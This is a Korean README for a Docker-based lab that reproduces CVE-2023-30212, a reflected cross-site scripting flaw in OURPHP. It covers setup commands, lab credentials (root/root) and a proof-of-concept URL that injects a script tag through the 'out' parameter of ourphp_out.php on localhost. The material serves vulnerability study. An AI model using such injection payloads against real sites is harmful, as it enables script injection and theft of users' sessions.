
반사형 XSS 취약점인 CVE-2023-30212를 재현하기 위한 Docker 기반 취약한 OURPHP 랩으로, 설정 지침과 개념 증명 악용 URL을 포함합니다.
사전 요구사항
docker.io 다운로드
sudo apt install -y docker.io
아래 명령어를 사용하여 내 저장소에서 모든 파일을 다운로드하세요.
git clone https://github.com/AAsh035/CVE-2023-30212.git
이제 Docker 이미지를 만들기 위해 다음 명령어를 실행하세요:
sudo docker build -t vuln .
다음은 Docker 이미지를 컨테이너로 전환합니다. 컨테이너는 포트 80에서 실행되어야 합니다. 명령어는 다음과 같습니다:
sudo docker run -d -p 80:80 vuln
컨테이너가 실행 중인지 확인하려면 다음 명령어를 사용하세요:
sudo docker ps
브라우저에 127.0.0.1을 입력하면 OURPHP 페이지가 로드됩니다.
다음과 같이 ourphp를 구성해야 합니다:
사용자 이름 : root
비밀번호 : root
데이터베이스 이름: vuln
이제 관리자용 사용자 이름과 비밀번호를 구성해야 합니다. 다음과 같이 설정하세요:
사용자 이름: root
비밀번호: root
이제 아래 링크를 복사하여 브라우저에 붙여넣으세요:
http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("bug")</script>
https://github.com/AAsh035/CVE-2023-30212/assets/136836668/218c8eca-f02b-41b2-931b-ba112da6c7e0